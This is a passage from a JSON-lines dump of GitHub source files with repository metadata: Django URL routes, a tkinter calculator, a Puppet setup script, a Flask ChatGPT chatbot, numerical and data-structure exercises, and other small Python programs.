#Eliminar actividad\n\n #----------- URL's para la aplicación de diseño de proyecto de investigación ----------\n path('inicio',vst_disinv().vst_inicio, name = 'ini_disinv'), #inicio de la app de diseño de proyecto de investigación\n \n #URL para el registro de un diseño de investigación\n path('creadis/',vts_reg_dispry.as_view(), name = 'crea_dis'), #Crea el diseño de un proyecto \n path('cndis/', vst_ls_dispry.as_view(), name='cn_dispry'), #Lista de diseños de proyectos\n path('cndetdis/', vts_ls_detdis.as_view(), name='cn_det_dis'), #Añadir información del diseño de un proyecto\n path('editdis//',vts_edit_dispry.as_view(), name = 'edit_dis'), #Actualizar diseño de un proyecto\n path('archidis/',fn_archi_dis, name = 'archi_dis'), #Archivar un diseño de un proyecto\n path('elidis/',fn_eli_dis, name = 'eli_dis'),#Eliminar un diseño de un proyecto\n\n #URL para el registro de un tema\n path('createma/',vts_reg_tema.as_view(), name = 'crea_tema'), #Crea el tema\n path('cntema/', vst_ls_tema.as_view(), name='cn_tema'), #Lista de los tema\n path('editema//',vts_edit_tema.as_view(), name = 'edit_tema'), #Actualiza el tema\n path('architema/',fn_archi_tema, name = 'archi_tema'), #Archivar un tema\n path('elitema/',fn_eli_tema, name = 'eli_tema'),#Eliminar un tema\n\n #URL para el registro de una definición\n path('creadefin/',vts_reg_defi.as_view(), name = 'crea_defin_dis'), #Crea la definición\n path('cndefin/', vst_ls_defi.as_view(), name='cn_defin_dis'), #Lista de laa definiciones\n path('edirdefin//',vts_edit_defi.as_view(), name = 'edit_defin_dis'), #Actualiza una definición\n path('archidefin/',fn_archi_defi, name = 'archi_defin_dis'), #Archivar una definición\n path('elidefin/',fn_eli_defi, name = 'eli_defin_dis'),#Eliminar una definición\n\n #URL para el registro de un árbol de problemas\n path('creaap/',vts_reg_ap.as_view(), name = 'crea_arb_pro'), #Crea un árbol de problemas\n path('cnap/', vst_ls_ap.as_view(), name='cn_arb_pro'), #Lista los árboles de problemas\n path('edirap//',vts_edit_ap.as_view(), name = 'edit_arb_pro'), #Actualiza un árbol de problemas\n path('archiap/',fn_archi_ap, name = 'archi_arb_pro'), #Archivar un árbol de problemas\n path('eliap/',fn_eli_ap, name = 'eli_arb_pro'),#Eliminar un árbol de problemas\n\n #URL para el registro de un árbol de objetivos\n path('creaao/',vts_reg_ao.as_view(), name = 'crea_arb_obj'), #Crea un árbol de objetivos\n path('cnao/', vst_ls_ao.as_view(), name='cn_arb_obj'), #Lista los árboles de objetivos\n path('edirao//',vts_edit_ao.as_view(), name = 'edit_arb_obj'), #Actualiza un árbol de objetivos\n path('archiao/',fn_archi_ao, name = 'archi_arb_obj'), #Archivar un árbol de objetivos\n path('eliao/',fn_eli_ao, name = 'eli_arb_obj'),#Eliminar un árbol de objetivos\n\n #URL para el registro de causas\n path('creacau/',vts_reg_cau.as_view(), name = 'crea_causa'), #Crea una causa\n path('cncau/', vst_ls_cau.as_view(), name='cn_causa'), #Lista las causas\n path('edircau//',vts_edit_cau.as_view(), name = 'edit_causa'), #Actualiza una causa\n path('archicau/',fn_archi_cau, name = 'archi_causa'), #Archivar una causa\n path('elicau/',fn_eli_cau, name = 'eli_causa'),#Eliminar una causa\n\n #URL para el registro de un efecto\n path('creaefe/',vts_reg_efe.as_view(), name = 'crea_efecto'), #Crea un efecto\n path('cnefe/', vst_ls_efe.as_view(), name='cn_efecto'), #Lista las efecto\n path('editefe//',vts_edit_efe.as_view(), name = 'edit_efecto'), #Actualiza un efecto\n path('archiefe/',fn_archi_efe, name = 'archi_efecto'), #Archivar un efecto\n path('eliefe/',fn_eli_efe, name = 'eli_efecto'),#Eliminar un efecto\n\n #URL para el registro de un medio\n path('creamed/',vts_reg_med.as_view(), name = 'crea_medio'), #Crea un medio\n path('cnmed/', vst_ls_med.as_view(), name='cn_medio'), #Lista las medio\n path('editmed//',vts_edit_med.as_view(), name = 'edit_medio'), #Actualiza un medio\n path('archimed/',fn_archi_med, name = 'archi_medio'), #Archivar un medio\n path('elimed/',fn_eli_med, name = 'eli_medio'),#Eliminar un medio\n\n #URL para el registro de un fin\n path('creafin/',vts_reg_fin.as_view(), name = 'crea_fin'), #Crea un fin\n path('cnfin/', vst_ls_fin.as_view(), name='cn_fin'), #Lista las fin\n path('editfin//',vts_edit_fin.as_view(), name = 'edit_fin'), #Actualiza un fin\n path('archifin/',fn_archi_fin, name = 'archi_fin'), #Archivar un fin\n path('elifin/',fn_eli_fin, name = 'eli_fin'),#Eliminar un fin\n\n #-------------------- URL para las funciones de la evaluación de un proyecto --------\n path('inicio',vst_evapry().vst_inicio, name = 'inicio_pry'), #inicio de la app de proyectos\n #URL para la evaluación de un proyecto\n path('creaeva/', vst_reg_evapry.as_view(), name = 'crear_eva'), #Crear evaluación de un proyecto\n path('cneva/', vst_ls_evapry.as_view(), name = 'cn_evapry'), #Consultar evaluación de un proyecto\n path('addeva/', vst_add_eva.as_view(), name = 'add_eva'), #Añadir información a una evaluación de un proyecto\n path('editeva//',vst_edit_evapry.as_view(), name = 'edit_eva'), #Editar la evaluación de un proyecto\n path('archieva/',fn_archi_eva, name = 'archi_eva'), #Archivar la evaluación de un proyecto\n path('elieva/',fn_eli_eva, name = 'eli_eva'),#Eliminar la evaluación de un proyecto\n #URL para rúbrica de evaluación\n path('crearub/', vst_crear_rub.as_view(), name = 'crear_rub'), #Crear rúbrica\n path('cndeteva/', vst_ls_rub.as_view(), name = 'cn_rub'), #Consultar rúbrica\n path('editrub//',vst_edit_rub.as_view(), name = 'edit_rub'), #Editar la rúbrica de evaluación de un proyecto\n path('archirub/',fn_archi_rub, name = 'archi_rub'), #Archivar la rúbrica de evaluación de un proyecto\n path('elirub/',fn_eli_rub, name = 'eli_rub'),#Eliminar la rúbrica de evaluación de un proyecto\n #URL para criterio de evaluación\n path('creacrit/', vst_crear_crit.as_view(), name = 'crear_crit'), #Crear criterios de la rúbrica\n path('cndeteva/', vst_ls_crit.as_view(), name = 'cn_crit'), #Consultar criterios evaluación de un proyecto\n path('editcrti//',vst_edit_crit.as_view(), name = 'edit_crit'), #Editar el criterio de evaluación de un proyecto\n path('archicrit/',fn_archi_crit, name = 'archi_crit'), #Archivar el criterio de evaluación de un proyecto\n path('elicrti/',fn_eli_crit, name = 'eli_crit'),#Eliminar el criterio de evaluación de un proyecto\n #URL para rango de evaluación\n path('crearango/', vst_crear_rango.as_view(), name = 'crear_rango'), #Crear un rango de evaluación \n path('cndeteva/', vst_ls_rango.as_view(), name = 'cn_rango'), #Consultar rango de evaluación de un proyecto\n path('editrng//',vst_edit_rng.as_view(), name = 'edit_rng'), #Editar el rango de evaluación de un proyecto\n path('archirng/',fn_archi_rng, name = 'archi_rng'), #Archivar el rango de evaluación de un proyecto\n path('elirng/',fn_eli_rng, name = 'eli_rng'),#Eliminar el rango de evaluación de un proyecto\n #URL para resultado de evaluación\n path('crearesul/', vst_crear_resul.as_view(), name = 'crear_resul'), #Crear un resultado de evaluación\n path('cndeteva/', vst_ls_resultado.as_view(), name = 'cn_res'), #Consultar resultado de una evaluación de un proyecto\n path('editres//',vst_edit_res.as_view(), name = 'edit_res'), #Editar el rsultado de una evaluación de un proyecto\n path('archires/',fn_archi_res, name = 'archi_res'), #Archivar el resultado de evaluación de un proyecto, solo para el rol de evaluadores\n path('elires/',fn_eli_res, name = 'eli_res'),#Eliminar el resultado de evaluación de un proyecto\n #URL para tipo de evaluación\n path('creatipo/', vst_crear_tipoeva.as_view(), name = 'crear_tipo'), #Crear tipo de evaluación\n path('cndeteva/', vst_ls_tipoeva.as_view(), name = 'cn_tipoeva'), #Consultar tipo de evaluación de un proyecto\n path('editipo//',vst_edit_tipo.as_view(), name = 'edit_tipo'), #Editar el tipo de evaluación de un proyecto\n path('elitipo/',fn_eli_tipo, name = 'eli_tipo'),#Eliminar el tipo de evaluación de un proyecto\n #URL para definciónes, comentarios, ect, de evaluación\n path('creardefi/', vst_crear_defi.as_view(), name = 'crear_defi'), #Crear definición, comentario, recomendación\n path('cndeteva/', vst_ls_defi.as_view(), name = 'cn_defi'), #Consultar definciónes, comentarios, ect, de la evaluación de un proyecto\n path('editdefi//',vst_edit_defi.as_view(), name = 'edit_defi'), #Editar definciónes, comentarios, ect, de la evaluación de un proyecto\n path('archidefi/',fn_archi_defi, name = 'archi_defi'), #Archivar definciónes, comentarios, ect, de la evaluación de un proyecto\n path('elidefi/',fn_eli_defi, name = 'eli_defi'),#Eliminar definciónes, comentarios, ect, de la evaluación de un proyecto\n\n #URL's para la aplicación de gestión de proyecto de investigación\n #path('inicio',vst_gespry().vst_inicio, name = 'ini_gespry'), #inicio de la app de gestión de proyectos\n\n #URL's para la aplicación de marco lógico\n #path('inicio',vst_mlog().vst_inicio, name = 'ini_mlog'), #inicio de la app de marco lógico\n\n #------------------------- URL's para la aplicación de recursos -------------------\n path('inicio',vst_recur().vst_inicio, name = 'ini_recur'), #inicio de la app de recursos\n path('crearecu/',vts_reg_recu.as_view(), name = 'crea_recu'), #Crea el recurso \n path('cnrecu/', vst_ls_recu.as_view(), name='cn_recu'), #Lista de recursos\n path('cndetrecu/',vst_ls_detrecu.as_view(), name = 'cn_det_recu'),\n path('editrecu//',vts_edit_recu.as_view(), name = 'edit_recu'), #Actualizar recurso\n path('archirecu/',fn_archi_recu, name = 'archi_recu'), #Archivar un recurso\n path('elirecu/',fn_eli_recu, name = 'eli_recu'),#Eliminar un recurso\n\n # ------------- URL's para la aplicación de registro de programa de investigación------\n path('inicio',vst_regprgi().vst_inicio, name = 'ini_regprgi'), #inicio de la app de registro de programa de investigación\n path('creaprgi/',vts_reg_prgi.as_view(), name = 'crea_prgi'), #Crea el programa de investigación \n path('cnprgi/', vst_ls_prgi.as_view(), name='cn_prgi'), #Lista de programas de investigación\n path('cndetprgi/',vst_ls_detprgi.as_view(), name = 'cn_det_prgi'), #Información en detalle de un programa de investigación\n path('editprgi//',vts_edit_prgi.as_view(), name = 'edit_prgi'), #Actualizar un programa de investigación\n path('archiprgi/',fn_archi_prgi, name = 'archi_prgi'), #Archivar un programa de investigación\n path('eliprgi/',fn_eli_prgi, name = 'eli_prgi'),#Eliminar un programa de investigación\n\n # ------------------------- URL para registro de un proyecto -----------------------\n path('inireg',vst_regpry().vst_inicio, name = 'ini_regpry'), #inicio de la app de proyectos\n path('creapry/',vts_reg_pry.as_view(), name = 'crea_pry'), #Crea el proyecto \n path('cnpry/', vst_ls_pry.as_view(), name='cn_pry'), #Lista de proyectos\n path('cndetpry/', vst_ls_infopry.as_view(), name='cn_det_pry'), #Lista de la información de los proyectos\n path('editpry//',vts_edit_pry.as_view(), name = 'edit_pry'), #Actualizar proyecto\n path('archipry/',fn_archi_pry, name = 'archi_pry'), #Archivar un proyecto\n path('elipry/',fn_eli_pry, name = 'eli_pry'),#Eliminar un proyecto\n\n #URL para la información adicional de un proyecto\n path('addpry/',vts_add_pry.as_view(), name = 'add_pry'),#Añadir información del proyecto\n path('cninf/', vst_ls_infopry.as_view(), name = 'cn_infpry'),#Consultar información adicional de un proyecto\n path('editinf//', vts_edit_infpry.as_view(), name = 'edit_inf'),#Editar información de un proyecto\n path('archinf/',fn_archi_infpry, name = 'archi_inf_pry'), #Archivar la información adicional de un proyecto\n path('elinf/',fn_eli_infpry, name = 'eli_inf_pry'),#Eliminar la información adicional de un proyecto\n\n #URL para la información geográfica de un proyecto\n path('addgeo/',vts_reg_geo.as_view(), name = 'add_geo'),#Añadir información geográfica del proyecto\n path('cngeo/', vst_ls_geopry.as_view(), name = 'cn_geo'),#Consultar información geográfica de un proyecto\n path('editgeo//', vts_edit_geo.as_view(), name = 'edit_geo'),#Editar información geográfica de un proyecto\n path('archigeo/',fn_archi_geo, name = 'archi_geo'), #Archivar la información geográfica de un proyecto\n path('eligeo/',fn_eli_geo, name = 'eli_geo'),#Eliminar la información geográfica de un proyecto\n\n #URL para los eventos de un proyecto\n path('addeven/',vts_reg_even.as_view(), name = 'add_even'),#Añadir eventos de un proyecto\n path('cneven/', vst_ls_evenpry.as_view(), name = 'cn_even'),#Consultar eventos de un proyecto\n path('editeven//', vts_edit_even.as_view(), name = 'edit_even'),#Editar eventos de un proyecto\n path('archieven/',fn_archi_even, name = 'archi_even'), #Archivar eventos de un proyecto\n path('elieven/',fn_eli_even, name = 'eli_even'),#Eliminar eventos de un proyecto\n\n #URL para la línea de investigación\n path('addlninv/',vts_reg_lninv.as_view(), name = 'add_lninv'),#Añadir línea de investigación\n path('cnlninv/', vst_ls_lninv.as_view(), name = 'cn_lninv'),#Consultar línea de investigación\n path('editlninv//', vts_edit_lninv.as_view(), name = 'edit_lninv'),#Editar línea de investigación\n path('archilninv/',fn_archi_lninv, name = 'archi_lninv'), #Archivar línea de investigación\n path('elilninv/',fn_eli_lninv, name = 'eli_lninv'),#Eliminar línea de investigación\n\n]\n\n\n","repo_name":"ustabog/sigepi-usta","sub_path":"modpry/app_modpry/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":20207,"program_lang":"python","lang":"es","doc_type":"code","stars":3,"dataset":"github-code","pt":"66"} +{"seq_id":"1623693675","text":"from tkinter import *\n\n\ndef dugmeBas(p):\n global nokta\n if hesapText.get() == \"Hata!\":\n hesapText.set(\"\")\n\n if nokta == True and p==\".\":\n return\n\n if p == \".\":\n nokta = True\n\n if p in \"+-*/\":\n nokta = False\n\n hesapText.set(hesapText.get() + p)\n\n\ndef sil():\n hesapText.set(\"\")\n nokta = False\n\n\ndef hesapla():\n nokta = False\n try:\n hesapText.set(str(eval(hesapText.get())))\n except:\n hesapText.set(\"Hata!\")\n\n\nroot = Tk()\nroot.title(\"Muhteşem Calculator\")\nroot.geometry(\"-50+100\")\n\ndugmeBaslik = [\"7\", \"8\", \"9\", \"4\", \"5\", \"6\", \"1\", \"2\", \"3\"]\nnokta = False\n\nhesapText = StringVar()\nfont = ('digital-7', 30)\nEntry(root, font=font, textvariable=hesapText, bg=\"SteelBlue1\"). \\\n grid(row=0, column=0, columnspan=5, sticky=\"NEWS\", ipady=10)\n\nsayac = 0\nfor satir in range(1, 4):\n for sutun in range(0, 3):\n Button(root, command=lambda prm=dugmeBaslik[sayac]: dugmeBas(prm),\n text=dugmeBaslik[sayac], relief=GROOVE, width=10, height=4). \\\n grid(row=satir, column=sutun)\n sayac += 1\nButton(root, text=\"0\", relief=GROOVE, bg=\"IndianRed1\", height=4,\n command=lambda: dugmeBas(\"0\")).grid(row=4, column=0, columnspan=2, sticky=\"NEWS\")\nButton(root, text=\".\", relief=GROOVE, bg=\"IndianRed1\",\n command=lambda: dugmeBas(\".\")).grid(row=4, column=2, sticky=\"NEWS\")\nButton(root, text=\"*\", relief=GROOVE, bg=\"IndianRed1\", width=10,\n command=lambda: dugmeBas(\"*\")).grid(row=1, column=4, sticky=\"NEWS\")\nButton(root, text=\"/\", relief=GROOVE, bg=\"IndianRed1\",\n command=lambda: dugmeBas(\"/\")).grid(row=2, column=4, sticky=\"NEWS\")\nButton(root, text=\"+\", relief=GROOVE, bg=\"IndianRed1\",\n command=lambda: dugmeBas(\"+\")).grid(row=3, column=4, sticky=\"NEWS\")\nButton(root, text=\"-\", relief=GROOVE, bg=\"IndianRed1\",\n command=lambda: dugmeBas(\"-\")).grid(row=4, column=4, sticky=\"NEWS\")\n\nButton(root, text=\"C\", relief=GROOVE, bg=\"Red3\",\n command=sil).grid(row=0, column=5, sticky=\"NEWS\")\n\nButton(root, text=\"=\", relief=GROOVE, bg=\"lime green\",\n command=hesapla).grid(row=3, column=5, rowspan=2, sticky=\"NEWS\")\n\nroot.mainloop()\n","repo_name":"qpulsar/PythonDersleri","sub_path":"Bote2019Guz/52_calculator.py","file_name":"52_calculator.py","file_ext":"py","file_size_in_byte":2158,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"66"} +{"seq_id":"36901704132","text":"def countNegatives():\n \"\"\"\n Function that counts and reports how many values are negative\n in a sequence of integers entered by the user. Press 'Enter' \n to quit.\n\n Params: None\n\n Returns: Prints a string stating how many negative numbers. If \n there is more than one negative number a plural will be used for\n 'numbers'. \n \"\"\"\n # We will store our count of negative numbers in the sequence here.\n count = 0\n # While count is greater than or equal to 0 the loop will run, unless\n # the user presses only the enter key, in which case we print the count\n # of negative numbers and end the loop.\n while count >= 0:\n # We keep our input in this num variable as a string as we want to \n # test for Enter key input too, and convert to int where required.\n num = input(\"Enter a number: \")\n if num == \"\" and count == 1:\n # If the user exits (blank input) and count is 1 we return singular\n # negative number and break the loop.\n print(\"There is \" + str(count) + \" negative number.\")\n break\n # If the input is empty and count is 0, it will return 0 negative numbers.\n elif num == \"\" and count == 0:\n print(\"There are \" + str(count) + \" negative numbers.\")\n break\n # If the input is Enter only and count above 0, we print the plural including\n # count of negative nuumbers.\n elif num == \"\" and count > 0:\n print(\"There are \" + str(count) + \" negative numbers.\")\n break\n # If the input is a negative number, increment count.\n elif int(num) < 0:\n count += 1\n\ncountNegatives()","repo_name":"adamrichardturner/python-birkbeck","sub_path":"countNegatives.py","file_name":"countNegatives.py","file_ext":"py","file_size_in_byte":1676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"3988757893","text":"import logging\nfrom subprocess import check_output\n\n\ndef setup():\n hostname = check_output('hostname').strip()\n certname = hostname + '.nodes.bluesense.co'\n logging.debug('puppet agent certname will be set to: ' + certname)\n\n puppet_config_file_path = '/etc/puppetlabs/puppet/puppet.conf'\n puppet_config = '[main]\\n' \\\n 'server = puppet-fleet.bluesense.co\\n' \\\n '[agent]\\n' \\\n 'certname = ' + certname + '\\n'\n\n file(puppet_config_file_path, 'w').write(puppet_config)\n\n check_output(['systemctl', 'enable', 'puppet'])\n check_output(['systemctl', 'start', 'puppet'])\n\n","repo_name":"blueSense/hub-bsntools","sub_path":"bsntools/firstboot/puppet.py","file_name":"puppet.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"27290056991","text":"from os import environ\nfrom cpt.packager import ConanMultiPackager\n\n\nif __name__ == \"__main__\":\n builder = ConanMultiPackager(\n\tremotes=\"https://api.bintray.com/conan/inexorgame/inexor-conan\",\n\tbuild_policy=\"missing\")\n builder.add_common_builds(pure_c=False)\n builder.run()\n","repo_name":"borune-k12/conan-etcd-grpc","sub_path":"build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"9896013955","text":"import pyglet\nfrom neon import NeonApp\n\nclass ScreensaverApp(NeonApp):\n \"\"\"This example is a terribly written screensaver app. Text bounces around\n the window. The implemenation is not finished because Neon apps do no\n currently initalize pyglet objects when receiving window information. That\n feature should be added sometime shortly.\"\"\"\n\n def on_init(self):\n # Initialize a text widget to move around\n self.text = pyglet.text.Label(\"Screensaver\", color=(255,0,0,255), anchor_x=\"center\", anchor_y=\"center\")\n self.text.x = self.x\n self.text.y = self.y +self.h\n self.widgets.append(self.text)\n self.direction = 0\n\n def on_draw(self):\n\n move = 1\n\n if self.direction == 0: #up/right\n self.text.x += move\n self.text.y += move\n\n if self.text.x >= self.x+self.w:\n self.direction = 3\n\n if self.text.y >= self.y+self.h:\n self.direction = 1\n\n elif self.direction == 1: #down/right\n self.text.x += move\n self.text.y -= move\n\n if self.text.x >= self.x+self.w:\n self.direction = 2\n\n if self.text.y < self.y:\n self.direction = 0\n\n elif self.direction == 2: #down/left\n self.text.x -= move\n self.text.y -= move\n\n if self.text.x < self.x:\n self.direction = 1\n\n if self.text.y < self.y:\n self.direction = 3\n\n elif self.direction == 3: #up/left\n self.text.x -= move\n self.text.y += move\n\n if self.text.x < self.x:\n self.direction = 0\n\n if self.text.y >= self.y+self.h:\n self.direction = 2\n\n self.text.draw()\n\n","repo_name":"excid3/neon","sub_path":"apps/screensaver_app.py","file_name":"screensaver_app.py","file_ext":"py","file_size_in_byte":1791,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"3351469699","text":"import numpy as np\nimport pandas as pd\nimport json\nimport argparse\nimport os\n\n\ndef get_args():\n parser = argparse.ArgumentParser(description='')\n parser.add_argument('--result_dir', required=True, type=str)\n args = parser.parse_args()\n return args\n\n\ndef evaluate_results(df):\n stats = {}\n df_timeout = df.loc[df['limit'] == df['step_count']]\n df_success = df.loc[df['success']]\n indices = []\n for info in df['info']:\n if type(info) is str:\n info = eval(info)\n indices.append(info[1] == 'ur5_robotiq' and info[2] == 'ur5_robotiq')\n else:\n indices.append(False)\n df_robot_collision = df.loc[indices]\n\n indices = []\n for info in df['info']:\n if type(info) is str:\n info = eval(info)\n indices.append(info[2] == 'plane')\n else:\n indices.append(False)\n df_plane_collision = df.loc[indices]\n n_valid_exps = len(df_success) + len(df_robot_collision) + len(df_plane_collision)\n\n stats['num_exps'] = len(df)\n stats['num_valid_exps'] = n_valid_exps\n stats['num_success'] = len(df_success)\n stats['avg_steps'] = df_success.mean().step_count\n stats['num_plane_collision'] = len(df_plane_collision)\n stats['num_robot_collision'] = len(df_robot_collision)\n stats['num_timeout'] = len(df_timeout)\n stats['success_rate'] = stats['num_success'] / stats['num_valid_exps']\n return stats\n\nif __name__ == \"__main__\":\n args = get_args()\n result_filepath = os.path.join(args.result_dir, 'results.csv')\n df = pd.read_csv(result_filepath, index_col=0)\n stats = evaluate_results(df)\n print(json.dumps(stats, indent=4))","repo_name":"columbia-ai-robotics/decentralized-multiarm","sub_path":"demo/evaluate_results.py","file_name":"evaluate_results.py","file_ext":"py","file_size_in_byte":1669,"program_lang":"python","lang":"en","doc_type":"code","stars":107,"dataset":"github-code","pt":"53"} +{"seq_id":"9730172439","text":"from pymoo.algorithms.soo.nonconvex.ga import GA\nfrom pymoo.problems import get_problem\nfrom pymoo.optimize import minimize\nfrom pb import display_helper\n\nproblem = get_problem(\"sphere\")\n\nalgorithm = GA(pop_size=100)\nmonitor=display_helper.SOGraphMonitor(minimize=True)\nres = minimize(problem,\n algorithm,\n ('n_gen', 50),\n seed=1,\n callback=monitor,\n verbose=True)\nmonitor.persist()","repo_name":"axlhtm/Hydroinformatics","sub_path":"Urban Modelling/PYMOO/pymoo_basics.py","file_name":"pymoo_basics.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23315162059","text":"\"\"\"\n// AI Chatbot\nChat with an intelligent bot using OpenAI ChatGPT API.\nUse voice or text to prompt and listen to the bot’s response.\n\n// TECHNOLOGIES\nBACKEND: Python - Flask - OpenAI ChatGPT API\nFRONTEND: JavaScript - HTML - CSS\n\n// DEV: Ali Jafarbeglou - since @ Oct 12, 2023\n\n\"\"\"\n\nfrom flask import Flask, render_template, request, session\nimport openai\n\n\n# Flask & OpenAPI Config Config\napp = Flask(__name__)\nAPI_KEY = open('API_KEY_.txt', 'r').read()\nopenai.api_key = API_KEY\n\napp.secret_key = 'secret_key'\nchat_log = []\n\n\n# Home Page\n@app.route('/', methods=['GET', 'POST'])\ndef home_page():\n session.setdefault('chat_log', []) # Initialize chat log in session\n return render_template('base.html')\n\n\n@app.route('/post_data', methods=['POST'])\ndef post_data():\n user_input = request.json\n session['chat_log'].append(f\"user: {user_input}\")\n\n try:\n response = openai.ChatCompletion.create(\n model=\"gpt-3.5-turbo\",\n messages=session['chat_log']\n )\n assistant_response = response['choices'][0]['message']['content'].strip()\n session['chat_log'].append(f\"assistant: {assistant_response}\")\n\n return assistant_response\n except openai.error.OpenAIError as e: # Generic OpenAI API error\n print(f\"Error: {e}\")\n return \"Sorry, there was an error processing your request.\"\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"zilogfa/ChatGPT-Prompt-Full-stack","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18051464171","text":"from sys import stdin\nfrom collections import Counter\n\nlines = [line[:-1] for line in stdin]\n\ndef part1(lines):\n s = 0\n for line in lines:\n split = line.split(\" \")\n if len(set(split)) == len(split):\n s += 1\n return s\n\ndef part2(lines):\n s = 0\n for line in lines:\n split = line.split(\" \")\n c = Counter(\"\".join(sorted(w)) for w in split)\n if len(c) == len(split):\n s += 1\n return s\n\nprint(part1(lines))\nprint(part2(lines))\n","repo_name":"Ikerlb/aoc2017","sub_path":"4/sol.py","file_name":"sol.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32395332340","text":"\"\"\"\nAuthor: ANTenna on 2021/12/27 11:34 上午\naliuyaohua@gmail.com\n\nDescription:\nload models, calculate diameter and save to file\n\"\"\"\n\nimport os\nimport sys\nimport glob\nimport numpy as np\nimport open3d as o3d\n\nsys.path.insert(0, os.getcwd() + '/..')\nfrom utils.o3d_impl import get_aabb\n\n\ndef get_diameter(model_pcd):\n # get bbox\n # obb = model_pcd.get_oriented_bounding_box()\n aabb = get_aabb(model_pcd)\n diameter = np.linalg.norm([aabb[0], aabb[1]])\n return diameter\n\n\nif __name__ == '__main__':\n root_path = '/Users/aibee/Downloads/Dataset/3DDataset/6DPose/UWA'\n model_path = os.path.join(root_path, 'model')\n model_list = glob.glob(model_path + '/*.ply')\n\n diam_save_path = os.path.join(root_path, 'model', 'model_diameter.npy') # {model_name: diam}\n\n model_diameter = {}\n for model_file in model_list:\n model_name = os.path.basename(model_file).split('.')[0]\n # load model\n pcd = o3d.io.read_point_cloud(model_file)\n # pcd_np = np.array(pcd.points)\n\n # get diameter\n diam = get_diameter(pcd)\n model_diameter[model_name] = diam\n\n print('model: {} diam: {}'.format(model_name, diam))\n np.save(diam_save_path, model_diameter)\n","repo_name":"antenna-fast/PoseEstimation","sub_path":"metric/get_models_diameter.py","file_name":"get_models_diameter.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41213034022","text":"# Newton iteration for solution of the Burgers equation\n# -u_xx + beta u u_x - f = 0 , u(-1)=u(1)=0.\n#\n# The linear equation for the Newton step v will be\n#\n# -v_xx + beta u^(k) v_x + beta v u^(k)_x - u^(k)_xx + beta u^(k) u^(k)_x-f=0\n# J v + r = 0\n# J = (-K + beta*diag(u^(k))*D + beta*diag(u^(k)))\n# r = -K*u^(k) + beta*diag(u^(k) .* (D*u^(k))) - f\n\nimport numpy.linalg as npla\nimport scipy.sparse.linalg as spla\nimport numpy as np\nimport scipy.sparse as sp\nfrom FDLaplacian1D import FDLaplacian1D\nfrom FDCentralDiff1D import FDCentralDiff1D\n\n\nbeta = 100.0\n\n\n# Set up an m by m matrix for FD discretization of the Laplacian\nm = 10\nK = FDLaplacian1D(-1.0, 1.0, m)\nD = FDCentralDiff1D(-1.0, 1.0, m)\nf = np.ones(m)\n# Set initial guess\nu0 = 0.0*np.ones(m)\nr = -K*u0 + beta*np.multiply(u0, D*u0) - f\nnormR = npla.norm(r)\nnormR0 = normR\n\n# Newton iteration\ntol = 1.0e-14\nmaxIter = 20 # if it doesn't converge in a few iters, it probably won't ever\nconv = False\n\n# Newton iteration for K u = f(u)\nfor i in range(maxIter):\n print('newton iter=%6d rel resid=%12.5g' % (i, normR/normR0))\n # Form Jacobian\n J = -K + beta*sp.diags([D*u0],[0]) + beta*sp.diags([u0],[0])*D\n # We've computed residual already.\n\n # Step eqn is: J*v + r = 0\n newtStep = spla.spsolve(J, -r) # Solve for step\n\n # Update solution\n u0 = u0 + newtStep\n # Compute residual at new iterate\n r = -K*u0 + beta*np.multiply(u0, D*u0) - f\n normR = npla.norm(r) # Compute residual norm\n # Check for convergence: stop if either normR or normDelta is small enough\n if normR < tol*normR0:\n conv = True\n break\n\nif conv:\n print('Converged to solution u=', u0)\n print('Residual: absolute |r|=%12.5g, relative |r|=%12.5g'\n %(normR, (normR/normR0) ))\nelse:\n print('Failure to converge after %d iterations' % maxIter)\n","repo_name":"krlong014/PyNonlin","sub_path":"NewtonBurgers.py","file_name":"NewtonBurgers.py","file_ext":"py","file_size_in_byte":1803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"43173984795","text":"# 1 Create Node\r\n# 2 Create Linked list\r\n# 3 Add Nodes to Linked list\r\n# Print\r\n\r\nclass Node:\r\n def __init__(self, data):\r\n self.data = data\r\n self.next = None \r\n \r\nclass Linkedlist:\r\n def __init__(self):\r\n self.head = None\r\n\r\n def insert(self, newNode): \r\n if self.head is None: # head=>One Piece->None \r\n self.head = newNode\r\n else:\r\n lastNode = self.head # head=>One Piece->JoyBoy->None || One Piece->Roger \r\n while True:\r\n if lastNode.next is None:\r\n break\r\n lastNode = lastNode.next\r\n lastNode.next = newNode\r\n\r\n def printList(self):\r\n # head=>One piece->JoyBoy->Roger->None \r\n if self.head is None:\r\n print(\"List in empty\") \r\n currentNode = self.head\r\n while True:\r\n if currentNode is None:\r\n break\r\n print(currentNode.data)\r\n currentNode = currentNode.next \r\n\r\n# Node => data, next\r\nfirstNode = Node(\"One Piece\")\r\nlinkedlist = Linkedlist()\r\n# linkedlist.insert(firstNode)\r\nsecondNode = Node(\"JoyBoy\")\r\n# linkedlist.insert(secondNode)\r\nthirdNode = Node(\"Roger\") \r\n# linkedlist.insert(thirdNode)\r\nlinkedlist.printList()\r\n\r\n","repo_name":"Rohit-155/Python","sub_path":"Data Structure & 